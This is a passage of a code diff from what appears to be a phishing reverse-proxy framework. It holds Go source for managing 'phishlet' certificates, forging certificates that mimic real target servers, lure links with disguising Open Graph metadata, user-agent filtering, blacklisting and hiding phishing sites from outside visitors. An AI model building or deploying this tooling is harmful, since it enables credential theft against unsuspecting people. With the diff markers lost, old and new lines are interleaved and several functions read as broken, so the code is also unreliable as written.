m, ok := d.phishletCache[base_domain]
|
||||
if ok {
|
||||
cert, ok := m[site_name]
|
||||
if ok {
|
||||
return cert, nil
|
||||
}
|
||||
}
|
||||
return nil, fmt.Errorf("certificate for phishlet '%s' and domain '%s' not found", site_name, base_domain)
|
||||
func (o *CertDb) setManagedSync(hosts []string, t time.Duration) error {
|
||||
ctx, cancel := context.WithTimeout(context.Background(), t)
|
||||
err := o.magic.ManageSync(ctx, hosts)
|
||||
cancel()
|
||||
return err
|
||||
}
|
||||
|
||||
func (d *CertDb) addPhishletCertificate(site_name string, base_domain string, cert *tls.Certificate) {
|
||||
_, ok := d.phishletCache[base_domain]
|
||||
if !ok {
|
||||
d.phishletCache[base_domain] = make(map[string]*tls.Certificate)
|
||||
}
|
||||
d.phishletCache[base_domain][site_name] = cert
|
||||
}
|
||||
|
||||
func (d *CertDb) loadPhishletCertificate(site_name string, base_domain string) error {
|
||||
crt_dir := filepath.Join(d.dataDir, base_domain)
|
||||
|
||||
cert, err := tls.LoadX509KeyPair(filepath.Join(crt_dir, site_name+".crt"), filepath.Join(crt_dir, site_name+".key"))
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
d.addPhishletCertificate(site_name, base_domain, &cert)
|
||||
func (o *CertDb) reloadCertificates() error {
|
||||
// TODO: load private certificates from disk
|
||||
return nil
|
||||
}
|
||||
|
||||
func (d *CertDb) obtainPhishletCertificate(site_name string, base_domain string, domains []string) error {
|
||||
if err := CreateDir(filepath.Join(d.dataDir, base_domain), 0700); err != nil {
|
||||
return err
|
||||
}
|
||||
crt_dir := filepath.Join(d.dataDir, base_domain)
|
||||
func (o *CertDb) getTLSCertificate(host string, port int) (*x509.Certificate, error) {
|
||||
log.Debug("Fetching TLS certificate for %s:%d ...", host, port)
|
||||
|
||||
cert_res, err := d.registerCertificate(domains)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
cert, err := tls.X509KeyPair(cert_res.Certificate, cert_res.PrivateKey)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
d.addPhishletCertificate(site_name, base_domain, &cert)
|
||||
|
||||
err = ioutil.WriteFile(filepath.Join(crt_dir, site_name+".crt"), cert_res.Certificate, 0600)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
err = ioutil.WriteFile(filepath.Join(crt_dir, site_name+".key"), cert_res.PrivateKey, 0600)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
func (d *CertDb) registerCertificate(domains []string) (*certificate.Resource, error) {
|
||||
var err error
|
||||
d.certUser = CertUser{
|
||||
Email: "", //hostmaster@" + d.cfg.GetBaseDomain(),
|
||||
key: d.PrivateKey,
|
||||
}
|
||||
|
||||
config := lego.NewConfig(&d.certUser)
|
||||
config.CADirURL = acmeURL
|
||||
config.Certificate.KeyType = certcrypto.RSA2048
|
||||
|
||||
d.client, err = lego.NewClient(config)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
d.httpChallenge = &HTTPChallenge{crt_db: d}
|
||||
|
||||
d.client.Challenge.SetHTTP01Provider(d.httpChallenge)
|
||||
d.client.Challenge.Remove(challenge.TLSALPN01)
|
||||
|
||||
reg, err := d.client.Registration.Register(registration.RegisterOptions{TermsOfServiceAgreed: true})
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
d.certUser.Registration = reg
|
||||
|
||||
req := certificate.ObtainRequest{
|
||||
Domains: domains,
|
||||
Bundle: true,
|
||||
}
|
||||
|
||||
cert_res, err := d.client.Certificate.Obtain(req)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
return cert_res, nil
|
||||
}
|
||||
|
||||
func (d *CertDb) getServerCertificate(host string, port int) *x509.Certificate {
|
||||
log.Debug("Fetching TLS certificate from %s:%d ...", host, port)
|
||||
|
||||
config := tls.Config{InsecureSkipVerify: true}
|
||||
config := tls.Config{InsecureSkipVerify: true, NextProtos: []string{"http/1.1"}}
|
||||
conn, err := tls.Dial("tcp", fmt.Sprintf("%s:%d", host, port), &config)
|
||||
if err != nil {
|
||||
log.Warning("Could not fetch TLS certificate from %s:%d: %s", host, port, err)
|
||||
return nil
|
||||
return nil, err
|
||||
}
|
||||
defer conn.Close()
|
||||
|
||||
state := conn.ConnectionState()
|
||||
|
||||
return state.PeerCertificates[0]
|
||||
return state.PeerCertificates[0], nil
|
||||
}
|
||||
|
||||
func (d *CertDb) SignCertificateForHost(host string, phish_host string, port int) (cert *tls.Certificate, err error) {
|
||||
func (o *CertDb) getSelfSignedCertificate(host string, phish_host string, port int) (cert *tls.Certificate, err error) {
|
||||
var x509ca *x509.Certificate
|
||||
var template x509.Certificate
|
||||
|
||||
cert, ok := d.tls_cache[host]
|
||||
cert, ok := o.tlsCache[host]
|
||||
if ok {
|
||||
return cert, nil
|
||||
}
|
||||
|
||||
if x509ca, err = x509.ParseCertificate(d.CACert.Certificate[0]); err != nil {
|
||||
if x509ca, err = x509.ParseCertificate(o.caCert.Certificate[0]); err != nil {
|
||||
return
|
||||
}
|
||||
|
||||
@ -407,9 +219,9 @@ func (d *CertDb) SignCertificateForHost(host string, phish_host string, port int
|
||||
}
|
||||
template.Subject.CommonName = host
|
||||
} else {
|
||||
srvCert := d.getServerCertificate(host, port)
|
||||
if srvCert == nil {
|
||||
return nil, fmt.Errorf("failed to get TLS certificate for: %s", host)
|
||||
srvCert, err := o.getTLSCertificate(host, port)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("failed to get TLS certificate for: %s:%d error: %s", host, port, err)
|
||||
} else {
|
||||
serialNumberLimit := new(big.Int).Lsh(big.NewInt(1), 128)
|
||||
serialNumber, err := rand.Int(rand.Reader, serialNumberLimit)
|
||||
@ -422,7 +234,7 @@ func (d *CertDb) SignCertificateForHost(host string, phish_host string, port int
|
||||
Issuer: x509ca.Subject,
|
||||
Subject: srvCert.Subject,
|
||||
NotBefore: srvCert.NotBefore,
|
||||
NotAfter: srvCert.NotAfter,
|
||||
NotAfter: time.Now().Add(time.Hour * 24 * 180),
|
||||
KeyUsage: srvCert.KeyUsage,
|
||||
ExtKeyUsage: srvCert.ExtKeyUsage,
|
||||
IPAddresses: srvCert.IPAddresses,
|
||||
@ -439,15 +251,15 @@ func (d *CertDb) SignCertificateForHost(host string, phish_host string, port int
|
||||
}
|
||||
|
||||
var derBytes []byte
|
||||
if derBytes, err = x509.CreateCertificate(rand.Reader, &template, x509ca, &pkey.PublicKey, d.CACert.PrivateKey); err != nil {
|
||||
if derBytes, err = x509.CreateCertificate(rand.Reader, &template, x509ca, &pkey.PublicKey, o.caCert.PrivateKey); err != nil {
|
||||
return
|
||||
}
|
||||
|
||||
cert = &tls.Certificate{
|
||||
Certificate: [][]byte{derBytes, d.CACert.Certificate[0]},
|
||||
Certificate: [][]byte{derBytes, o.caCert.Certificate[0]},
|
||||
PrivateKey: pkey,
|
||||
}
|
||||
|
||||
d.tls_cache[host] = cert
|
||||
o.tlsCache[host] = cert
|
||||
return cert, nil
|
||||
}
|
||||
|
592
core/config.go
592
core/config.go
@ -11,82 +11,101 @@ import (
|
||||
"github.com/spf13/viper"
|
||||
)
|
||||
|
||||
var BLACKLIST_MODES = []string{"all", "unauth", "noadd", "off"}
|
||||
|
||||
type Lure struct {
|
||||
Hostname string `mapstructure:"hostname" yaml:"hostname"`
|
||||
Path string `mapstructure:"path" yaml:"path"`
|
||||
RedirectUrl string `mapstructure:"redirect_url" yaml:"redirect_url"`
|
||||
Phishlet string `mapstructure:"phishlet" yaml:"phishlet"`
|
||||
Template string `mapstructure:"template" yaml:"template"`
|
||||
UserAgentFilter string `mapstructure:"ua_filter" yaml:"ua_filter"`
|
||||
Info string `mapstructure:"info" yaml:"info"`
|
||||
OgTitle string `mapstructure:"og_title" yaml:"og_title"`
|
||||
OgDescription string `mapstructure:"og_desc" yaml:"og_desc"`
|
||||
OgImageUrl string `mapstructure:"og_image" yaml:"og_image"`
|
||||
OgUrl string `mapstructure:"og_url" yaml:"og_url"`
|
||||
Hostname string `mapstructure:"hostname" json:"hostname" yaml:"hostname"`
|
||||
Path string `mapstructure:"path" json:"path" yaml:"path"`
|
||||
RedirectUrl string `mapstructure:"redirect_url" json:"redirect_url" yaml:"redirect_url"`
|
||||
Phishlet string `mapstructure:"phishlet" json:"phishlet" yaml:"phishlet"`
|
||||
Redirector string `mapstructure:"redirector" json:"redirector" yaml:"redirector"`
|
||||
UserAgentFilter string `mapstructure:"ua_filter" json:"ua_filter" yaml:"ua_filter"`
|
||||
Info string `mapstructure:"info" json:"info" yaml:"info"`
|
||||
OgTitle string `mapstructure:"og_title" json:"og_title" yaml:"og_title"`
|
||||
OgDescription string `mapstructure:"og_desc" json:"og_desc" yaml:"og_desc"`
|
||||
OgImageUrl string `mapstructure:"og_image" json:"og_image" yaml:"og_image"`
|
||||
OgUrl string `mapstructure:"og_url" json:"og_url" yaml:"og_url"`
|
||||
}
|
||||
|
||||
type SubPhishlet struct {
|
||||
Name string `mapstructure:"name" json:"name" yaml:"name"`
|
||||
ParentName string `mapstructure:"parent_name" json:"parent_name" yaml:"parent_name"`
|
||||
Params map[string]string `mapstructure:"params" json:"params" yaml:"params"`
|
||||
}
|
||||
|
||||
type PhishletConfig struct {
|
||||
Hostname string `mapstructure:"hostname" json:"hostname" yaml:"hostname"`
|
||||
Enabled bool `mapstructure:"enabled" json:"enabled" yaml:"enabled"`
|
||||
Visible bool `mapstructure:"visible" json:"visible" yaml:"visible"`
|
||||
}
|
||||
|
||||
type ProxyConfig struct {
|
||||
Type string `mapstructure:"type" json:"type" yaml:"type"`
|
||||
Address string `mapstructure:"address" json:"address" yaml:"address"`
|
||||
Port int `mapstructure:"port" json:"port" yaml:"port"`
|
||||
Username string `mapstructure:"username" json:"username" yaml:"username"`
|
||||
Password string `mapstructure:"password" json:"password" yaml:"password"`
|
||||
Enabled bool `mapstructure:"enabled" json:"enabled" yaml:"enabled"`
|
||||
}
|
||||
|
||||
type BlacklistConfig struct {
|
||||
Mode string `mapstructure:"mode" json:"mode" yaml:"mode"`
|
||||
}
|
||||
|
||||
type CertificatesConfig struct {
|
||||
}
|
||||
|
||||
type GeneralConfig struct {
|
||||
Domain string `mapstructure:"domain" json:"domain" yaml:"domain"`
|
||||
Ipv4 string `mapstructure:"ipv4" json:"ipv4" yaml:"ipv4"`
|
||||
RedirectUrl string `mapstructure:"redirect_url" json:"redirect_url" yaml:"redirect_url"`
|
||||
HttpsPort int `mapstructure:"https_port" json:"https_port" yaml:"https_port"`
|
||||
DnsPort int `mapstructure:"dns_port" json:"dns_port" yaml:"dns_port"`
|
||||
}
|
||||
|
||||
type Config struct {
|
||||
siteDomains map[string]string
|
||||
baseDomain string
|
||||
serverIP string
|
||||
proxyType string
|
||||
proxyAddress string
|
||||
proxyPort int
|
||||
proxyUsername string
|
||||
proxyPassword string
|
||||
blackListMode string
|
||||
proxyEnabled bool
|
||||
sitesEnabled map[string]bool
|
||||
sitesHidden map[string]bool
|
||||
phishlets map[string]*Phishlet
|
||||
phishletNames []string
|
||||
activeHostnames []string
|
||||
redirectParam string
|
||||
verificationParam string
|
||||
verificationToken string
|
||||
redirectUrl string
|
||||
templatesDir string
|
||||
lures []*Lure
|
||||
cfg *viper.Viper
|
||||
general *GeneralConfig
|
||||
certificates *CertificatesConfig
|
||||
blacklistConfig *BlacklistConfig
|
||||
proxyConfig *ProxyConfig
|
||||
phishletConfig map[string]*PhishletConfig
|
||||
phishlets map[string]*Phishlet
|
||||
phishletNames []string
|
||||
activeHostnames []string
|
||||
redirectorsDir string
|
||||
lures []*Lure
|
||||
subphishlets []*SubPhishlet
|
||||
cfg *viper.Viper
|
||||
}
|
||||
|
||||
const (
|
||||
CFG_SITE_DOMAINS = "site_domains"
|
||||
CFG_BASE_DOMAIN = "server"
|
||||
CFG_SERVER_IP = "ip"
|
||||
CFG_SITES_ENABLED = "sites_enabled"
|
||||
CFG_SITES_HIDDEN = "sites_hidden"
|
||||
CFG_REDIRECT_PARAM = "redirect_key"
|
||||
CFG_VERIFICATION_PARAM = "verification_key"
|
||||
CFG_VERIFICATION_TOKEN = "verification_token"
|
||||
CFG_REDIRECT_URL = "redirect_url"
|
||||
CFG_LURES = "lures"
|
||||
CFG_PROXY_TYPE = "proxy_type"
|
||||
CFG_PROXY_ADDRESS = "proxy_address"
|
||||
CFG_PROXY_PORT = "proxy_port"
|
||||
CFG_PROXY_USERNAME = "proxy_username"
|
||||
CFG_PROXY_PASSWORD = "proxy_password"
|
||||
CFG_PROXY_ENABLED = "proxy_enabled"
|
||||
CFG_BLACKLIST_MODE = "blacklist_mode"
|
||||
CFG_GENERAL = "general"
|
||||
CFG_CERTIFICATES = "certificates"
|
||||
CFG_LURES = "lures"
|
||||
CFG_PROXY = "proxy"
|
||||
CFG_PHISHLETS = "phishlets"
|
||||
CFG_BLACKLIST = "blacklist"
|
||||
CFG_SUBPHISHLETS = "subphishlets"
|
||||
)
|
||||
|
||||
const DEFAULT_REDIRECT_URL = "https://www.youtube.com/watch?v=dQw4w9WgXcQ" // Rick'roll
|
||||
|
||||
func NewConfig(cfg_dir string, path string) (*Config, error) {
|
||||
c := &Config{
|
||||
siteDomains: make(map[string]string),
|
||||
sitesEnabled: make(map[string]bool),
|
||||
sitesHidden: make(map[string]bool),
|
||||
phishlets: make(map[string]*Phishlet),
|
||||
phishletNames: []string{},
|
||||
lures: []*Lure{},
|
||||
general: &GeneralConfig{},
|
||||
certificates: &CertificatesConfig{},
|
||||
phishletConfig: make(map[string]*PhishletConfig),
|
||||
phishlets: make(map[string]*Phishlet),
|
||||
phishletNames: []string{},
|
||||
lures: []*Lure{},
|
||||
blacklistConfig: &BlacklistConfig{},
|
||||
}
|
||||
|
||||
c.cfg = viper.New()
|
||||
c.cfg.SetConfigType("yaml")
|
||||
c.cfg.SetConfigType("json")
|
||||
|
||||
if path == "" {
|
||||
path = filepath.Join(cfg_dir, "config.yaml")
|
||||
path = filepath.Join(cfg_dir, "config.json")
|
||||
}
|
||||
err := os.MkdirAll(filepath.Dir(path), os.FileMode(0700))
|
||||
if err != nil {
|
||||
@ -107,96 +126,107 @@ func NewConfig(cfg_dir string, path string) (*Config, error) {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
c.baseDomain = c.cfg.GetString(CFG_BASE_DOMAIN)
|
||||
c.serverIP = c.cfg.GetString(CFG_SERVER_IP)
|
||||
c.siteDomains = c.cfg.GetStringMapString(CFG_SITE_DOMAINS)
|
||||
c.redirectParam = c.cfg.GetString(CFG_REDIRECT_PARAM)
|
||||
c.verificationParam = c.cfg.GetString(CFG_VERIFICATION_PARAM)
|
||||
c.verificationToken = c.cfg.GetString(CFG_VERIFICATION_TOKEN)
|
||||
c.redirectUrl = c.cfg.GetString(CFG_REDIRECT_URL)
|
||||
c.proxyType = c.cfg.GetString(CFG_PROXY_TYPE)
|
||||
c.proxyAddress = c.cfg.GetString(CFG_PROXY_ADDRESS)
|
||||
c.proxyPort = c.cfg.GetInt(CFG_PROXY_PORT)
|
||||
c.proxyUsername = c.cfg.GetString(CFG_PROXY_USERNAME)
|
||||
c.proxyPassword = c.cfg.GetString(CFG_PROXY_PASSWORD)
|
||||
c.proxyEnabled = c.cfg.GetBool(CFG_PROXY_ENABLED)
|
||||
c.blackListMode = c.cfg.GetString(CFG_BLACKLIST_MODE)
|
||||
s_enabled := c.cfg.GetStringSlice(CFG_SITES_ENABLED)
|
||||
for _, site := range s_enabled {
|
||||
c.sitesEnabled[site] = true
|
||||
}
|
||||
s_hidden := c.cfg.GetStringSlice(CFG_SITES_HIDDEN)
|
||||
for _, site := range s_hidden {
|
||||
c.sitesHidden[site] = true
|
||||
c.cfg.UnmarshalKey(CFG_GENERAL, &c.general)
|
||||
c.cfg.UnmarshalKey(CFG_BLACKLIST, &c.blacklistConfig)
|
||||
|
||||
if !stringExists(c.blacklistConfig.Mode, BLACKLIST_MODES) {
|
||||
c.SetBlacklistMode("unauth")
|
||||
}
|
||||
|
||||
if !stringExists(c.blackListMode, []string{"all", "unauth", "off"}) {
|
||||
c.SetBlacklistMode("off")
|
||||
}
|
||||
|
||||
var param string
|
||||
if c.redirectParam == "" {
|
||||
param = strings.ToLower(GenRandomString(2))
|
||||
c.SetRedirectParam(param)
|
||||
}
|
||||
if c.verificationParam == "" {
|
||||
for {
|
||||
param = strings.ToLower(GenRandomString(2))
|
||||
if param != c.redirectParam {
|
||||
break
|
||||
}
|
||||
}
|
||||
c.SetVerificationParam(param)
|
||||
}
|
||||
if c.verificationToken == "" {
|
||||
c.SetVerificationToken(GenRandomToken()[:4])
|
||||
}
|
||||
if c.redirectUrl == "" && created_cfg {
|
||||
if c.general.RedirectUrl == "" && created_cfg {
|
||||
c.SetRedirectUrl(DEFAULT_REDIRECT_URL)
|
||||
}
|
||||
if c.general.HttpsPort == 0 {
|
||||
c.SetHttpsPort(443)
|
||||
}
|
||||
if c.general.DnsPort == 0 {
|
||||
c.SetDnsPort(53)
|
||||
}
|
||||
|
||||
c.lures = []*Lure{}
|
||||
c.cfg.UnmarshalKey(CFG_LURES, &c.lures)
|
||||
c.proxyConfig = &ProxyConfig{}
|
||||
c.cfg.UnmarshalKey(CFG_PROXY, &c.proxyConfig)
|
||||
c.cfg.UnmarshalKey(CFG_PHISHLETS, &c.phishletConfig)
|
||||
c.cfg.UnmarshalKey(CFG_CERTIFICATES, &c.certificates)
|
||||
|
||||
return c, nil
|
||||
}
|
||||
|
||||
func (c *Config) SetSiteHostname(site string, domain string) bool {
|
||||
if c.baseDomain == "" {
|
||||
log.Error("you need to set server domain, first. type: server your-domain.com")
|
||||
func (c *Config) PhishletConfig(site string) *PhishletConfig {
|
||||
if o, ok := c.phishletConfig[site]; ok {
|
||||
return o
|
||||
} else {
|
||||
o := &PhishletConfig{
|
||||
Hostname: "",
|
||||
Enabled: false,
|
||||
Visible: true,
|
||||
}
|
||||
c.phishletConfig[site] = o
|
||||
return o
|
||||
}
|
||||
}
|
||||
|
||||
func (c *Config) SavePhishlets() {
|
||||
c.cfg.Set(CFG_PHISHLETS, c.phishletConfig)
|
||||
c.cfg.WriteConfig()
|
||||
}
|
||||
|
||||
func (c *Config) SetSiteHostname(site string, hostname string) bool {
|
||||
if c.general.Domain == "" {
|
||||
log.Error("you need to set server top-level domain, first. type: server your-domain.com")
|
||||
return false
|
||||
}
|
||||
if _, err := c.GetPhishlet(site); err != nil {
|
||||
pl, err := c.GetPhishlet(site)
|
||||
if err != nil {
|
||||
log.Error("%v", err)
|
||||
return false
|
||||
}
|
||||
if domain != c.baseDomain && !strings.HasSuffix(domain, "."+c.baseDomain) {
|
||||
log.Error("phishlet hostname must end with '%s'", c.baseDomain)
|
||||
if pl.isTemplate {
|
||||
log.Error("phishlet is a template - can't set hostname")
|
||||
return false
|
||||
}
|
||||
c.siteDomains[site] = domain
|
||||
c.cfg.Set(CFG_SITE_DOMAINS, c.siteDomains)
|
||||
log.Info("phishlet '%s' hostname set to: %s", site, domain)
|
||||
c.cfg.WriteConfig()
|
||||
if hostname != "" && hostname != c.general.Domain && !strings.HasSuffix(hostname, "."+c.general.Domain) {
|
||||
log.Error("phishlet hostname must end with '%s'", c.general.Domain)
|
||||
return false
|
||||
}
|
||||
log.Info("phishlet '%s' hostname set to: %s", site, hostname)
|
||||
c.PhishletConfig(site).Hostname = hostname
|
||||
c.SavePhishlets()
|
||||
return true
|
||||
}
|
||||
|
||||
func (c *Config) SetBaseDomain(domain string) {
|
||||
c.baseDomain = domain
|
||||
c.cfg.Set(CFG_BASE_DOMAIN, c.baseDomain)
|
||||
c.general.Domain = domain
|
||||
c.cfg.Set(CFG_GENERAL, c.general)
|
||||
log.Info("server domain set to: %s", domain)
|
||||
c.cfg.WriteConfig()
|
||||
}
|
||||
|
||||
func (c *Config) SetServerIP(ip_addr string) {
|
||||
c.serverIP = ip_addr
|
||||
c.cfg.Set(CFG_SERVER_IP, c.serverIP)
|
||||
c.general.Ipv4 = ip_addr
|
||||
c.cfg.Set(CFG_GENERAL, c.general)
|
||||
log.Info("server IP set to: %s", ip_addr)
|
||||
c.cfg.WriteConfig()
|
||||
}
|
||||
|
||||
func (c *Config) SetHttpsPort(port int) {
|
||||
c.general.HttpsPort = port
|
||||
c.cfg.Set(CFG_GENERAL, c.general)
|
||||
log.Info("https port set to: %d", port)
|
||||
c.cfg.WriteConfig()
|
||||
}
|
||||
|
||||
func (c *Config) SetDnsPort(port int) {
|
||||
c.general.DnsPort = port
|
||||
c.cfg.Set(CFG_GENERAL, c.general)
|
||||
log.Info("dns port set to: %d", port)
|
||||
c.cfg.WriteConfig()
|
||||
}
|
||||
|
||||
func (c *Config) EnableProxy(enabled bool) {
|
||||
c.proxyEnabled = enabled
|
||||
c.cfg.Set(CFG_PROXY_ENABLED, c.proxyEnabled)
|
||||
c.proxyConfig.Enabled = enabled
|
||||
c.cfg.Set(CFG_PROXY, c.proxyConfig)
|
||||
if enabled {
|
||||
log.Info("enabled proxy")
|
||||
} else {
|
||||
@ -211,44 +241,44 @@ func (c *Config) SetProxyType(ptype string) {
|
||||
log.Error("invalid proxy type selected")
|
||||
return
|
||||
}
|
||||
c.proxyType = ptype
|
||||
c.cfg.Set(CFG_PROXY_TYPE, c.proxyType)
|
||||
log.Info("proxy type set to: %s", c.proxyType)
|
||||
c.proxyConfig.Type = ptype
|
||||
c.cfg.Set(CFG_PROXY, c.proxyConfig)
|
||||
log.Info("proxy type set to: %s", ptype)
|
||||
c.cfg.WriteConfig()
|
||||
}
|
||||
|
||||
func (c *Config) SetProxyAddress(address string) {
|
||||
c.proxyAddress = address
|
||||
c.cfg.Set(CFG_PROXY_ADDRESS, c.proxyAddress)
|
||||
log.Info("proxy address set to: %s", c.proxyAddress)
|
||||
c.proxyConfig.Address = address
|
||||
c.cfg.Set(CFG_PROXY, c.proxyConfig)
|
||||
log.Info("proxy address set to: %s", address)
|
||||
c.cfg.WriteConfig()
|
||||
}
|
||||
|
||||
func (c *Config) SetProxyPort(port int) {
|
||||
c.proxyPort = port
|
||||
c.cfg.Set(CFG_PROXY_PORT, c.proxyPort)
|
||||
log.Info("proxy port set to: %d", c.proxyPort)
|
||||
c.proxyConfig.Port = port
|
||||
c.cfg.Set(CFG_PROXY, c.proxyConfig.Port)
|
||||
log.Info("proxy port set to: %d", port)
|
||||
c.cfg.WriteConfig()
|
||||
}
|
||||
|
||||
func (c *Config) SetProxyUsername(username string) {
|
||||
c.proxyUsername = username
|
||||
c.cfg.Set(CFG_PROXY_USERNAME, c.proxyUsername)
|
||||
log.Info("proxy username set to: %s", c.proxyUsername)
|
||||
c.proxyConfig.Username = username
|
||||
c.cfg.Set(CFG_PROXY, c.proxyConfig)
|
||||
log.Info("proxy username set to: %s", username)
|
||||
c.cfg.WriteConfig()
|
||||
}
|
||||
|
||||
func (c *Config) SetProxyPassword(password string) {
|
||||
c.proxyPassword = password
|
||||
c.cfg.Set(CFG_PROXY_PASSWORD, c.proxyPassword)
|
||||
log.Info("proxy password set to: %s", c.proxyPassword)
|
||||
c.proxyConfig.Password = password
|
||||
c.cfg.Set(CFG_PROXY, c.proxyConfig)
|
||||
log.Info("proxy password set to: %s", password)
|
||||
c.cfg.WriteConfig()
|
||||
}
|
||||
|
||||
func (c *Config) IsLureHostnameValid(hostname string) bool {
|
||||
for _, l := range c.lures {
|
||||
if l.Hostname == hostname {
|
||||
if c.sitesEnabled[l.Phishlet] {
|
||||
if c.PhishletConfig(l.Phishlet).Enabled {
|
||||
return true
|
||||
}
|
||||
}
|
||||
@ -257,21 +287,23 @@ func (c *Config) IsLureHostnameValid(hostname string) bool {
|
||||
}
|
||||
|
||||
func (c *Config) SetSiteEnabled(site string) error {
|
||||
if _, err := c.GetPhishlet(site); err != nil {
|
||||
pl, err := c.GetPhishlet(site)
|
||||
if err != nil {
|
||||
log.Error("%v", err)
|
||||
return err
|
||||
}
|
||||
if !c.IsSiteEnabled(site) {
|
||||
c.sitesEnabled[site] = true
|
||||
if c.PhishletConfig(site).Hostname == "" {
|
||||
return fmt.Errorf("enabling phishlet '%s' requires its hostname to be set up", site)
|
||||
}
|
||||
if pl.isTemplate {
|
||||
return fmt.Errorf("phishlet '%s' is a template - you have to 'create' child phishlet from it, with predefined parameters, before you can enable it.", site)
|
||||
}
|
||||
c.PhishletConfig(site).Enabled = true
|
||||
c.refreshActiveHostnames()
|
||||
var sites []string
|
||||
for s, _ := range c.sitesEnabled {
|
||||
sites = append(sites, s)
|
||||
}
|
||||
c.cfg.Set(CFG_SITES_ENABLED, sites)
|
||||
c.VerifyPhishlets()
|
||||
log.Info("enabled phishlet '%s'", site)
|
||||
c.cfg.WriteConfig()
|
||||
|
||||
c.SavePhishlets()
|
||||
return nil
|
||||
}
|
||||
|
||||
@ -280,17 +312,11 @@ func (c *Config) SetSiteDisabled(site string) error {
|
||||
log.Error("%v", err)
|
||||
return err
|
||||
}
|
||||
if c.IsSiteEnabled(site) {
|
||||
delete(c.sitesEnabled, site)
|
||||
}
|
||||
c.PhishletConfig(site).Enabled = false
|
||||
c.refreshActiveHostnames()
|
||||
var sites []string
|
||||
for s, _ := range c.sitesEnabled {
|
||||
sites = append(sites, s)
|
||||
}
|
||||
c.cfg.Set(CFG_SITES_ENABLED, sites)
|
||||
log.Info("disabled phishlet '%s'", site)
|
||||
c.cfg.WriteConfig()
|
||||
|
||||
c.SavePhishlets()
|
||||
return nil
|
||||
}
|
||||
|
||||
@ -299,102 +325,57 @@ func (c *Config) SetSiteHidden(site string, hide bool) error {
|
||||
log.Error("%v", err)
|
||||
return err
|
||||
}
|
||||
if hide {
|
||||
if !c.IsSiteHidden(site) {
|
||||
c.sitesHidden[site] = true
|
||||
}
|
||||
} else {
|
||||
if c.IsSiteHidden(site) {
|
||||
delete(c.sitesHidden, site)
|
||||
}
|
||||
}
|
||||
c.PhishletConfig(site).Visible = !hide
|
||||
c.refreshActiveHostnames()
|
||||
var sites []string
|
||||
for s, _ := range c.sitesHidden {
|
||||
sites = append(sites, s)
|
||||
}
|
||||
c.cfg.Set(CFG_SITES_HIDDEN, sites)
|
||||
|
||||
if hide {
|
||||
log.Info("phishlet '%s' is now hidden and all requests to it will be redirected", site)
|
||||
} else {
|
||||
log.Info("phishlet '%s' is now reachable and visible from the outside", site)
|
||||
}
|
||||
c.cfg.WriteConfig()
|
||||
c.SavePhishlets()
|
||||
return nil
|
||||
}
|
||||
|
||||
func (c *Config) SetTemplatesDir(path string) {
|
||||
c.templatesDir = path
|
||||
func (c *Config) SetRedirectorsDir(path string) {
|
||||
c.redirectorsDir = path
|
||||
}
|
||||
|
||||
func (c *Config) ResetAllSites() {
|
||||
for s, _ := range c.sitesEnabled {
|
||||
c.SetSiteDisabled(s)
|
||||
}
|
||||
for s, _ := range c.phishlets {
|
||||
c.siteDomains[s] = ""
|
||||
}
|
||||
c.cfg.Set(CFG_SITE_DOMAINS, c.siteDomains)
|
||||
c.cfg.WriteConfig()
|
||||
c.phishletConfig = make(map[string]*PhishletConfig)
|
||||
c.SavePhishlets()
|
||||
}
|
||||
|
||||
func (c *Config) IsSiteEnabled(site string) bool {
|
||||
s, ok := c.sitesEnabled[site]
|
||||
if !ok {
|
||||
return false
|
||||
}
|
||||
return s
|
||||
return c.PhishletConfig(site).Enabled
|
||||
}
|
||||
|
||||
func (c *Config) IsSiteHidden(site string) bool {
|
||||
s, ok := c.sitesHidden[site]
|
||||
if !ok {
|
||||
return false
|
||||
}
|
||||
return s
|
||||
return !c.PhishletConfig(site).Visible
|
||||
}
|
||||
|
||||
func (c *Config) GetEnabledSites() []string {
|
||||
var sites []string
|
||||
for s, _ := range c.sitesEnabled {
|
||||
sites = append(sites, s)
|
||||
for k, o := range c.phishletConfig {
|
||||
if o.Enabled {
|
||||
sites = append(sites, k)
|
||||
}
|
||||
}
|
||||
return sites
|
||||
}
|
||||
|
||||
func (c *Config) SetRedirectParam(param string) {
|
||||
c.redirectParam = param
|
||||
c.cfg.Set(CFG_REDIRECT_PARAM, param)
|
||||
log.Info("redirect parameter set to: %s", param)
|
||||
c.cfg.WriteConfig()
|
||||
}
|
||||
|
||||
func (c *Config) SetBlacklistMode(mode string) {
|
||||
if stringExists(mode, []string{"all", "unauth", "off"}) {
|
||||
c.blackListMode = mode
|
||||
c.cfg.Set(CFG_BLACKLIST_MODE, mode)
|
||||
if stringExists(mode, BLACKLIST_MODES) {
|
||||
c.blacklistConfig.Mode = mode
|
||||
c.cfg.Set(CFG_BLACKLIST, c.blacklistConfig)
|
||||
c.cfg.WriteConfig()
|
||||
}
|
||||
log.Info("blacklist mode set to: %s", mode)
|
||||
}
|
||||
|
||||
func (c *Config) SetVerificationParam(param string) {
|
||||
c.verificationParam = param
|
||||
c.cfg.Set(CFG_VERIFICATION_PARAM, param)
|
||||
log.Info("verification parameter set to: %s", param)
|
||||
c.cfg.WriteConfig()
|
||||
}
|
||||
|
||||
func (c *Config) SetVerificationToken(token string) {
|
||||
c.verificationToken = token
|
||||
c.cfg.Set(CFG_VERIFICATION_TOKEN, token)
|
||||
log.Info("verification token set to: %s", token)
|
||||
c.cfg.WriteConfig()
|
||||
}
|
||||
|
||||
func (c *Config) SetRedirectUrl(url string) {
|
||||
c.redirectUrl = url
|
||||
c.cfg.Set(CFG_REDIRECT_URL, url)
|
||||
c.general.RedirectUrl = url
|
||||
c.cfg.Set(CFG_GENERAL, c.general)
|
||||
log.Info("unauthorized request redirection URL set to: %s", url)
|
||||
c.cfg.WriteConfig()
|
||||
}
|
||||
@ -407,20 +388,46 @@ func (c *Config) refreshActiveHostnames() {
|
||||
if err != nil {
|
||||
continue
|
||||
}
|
||||
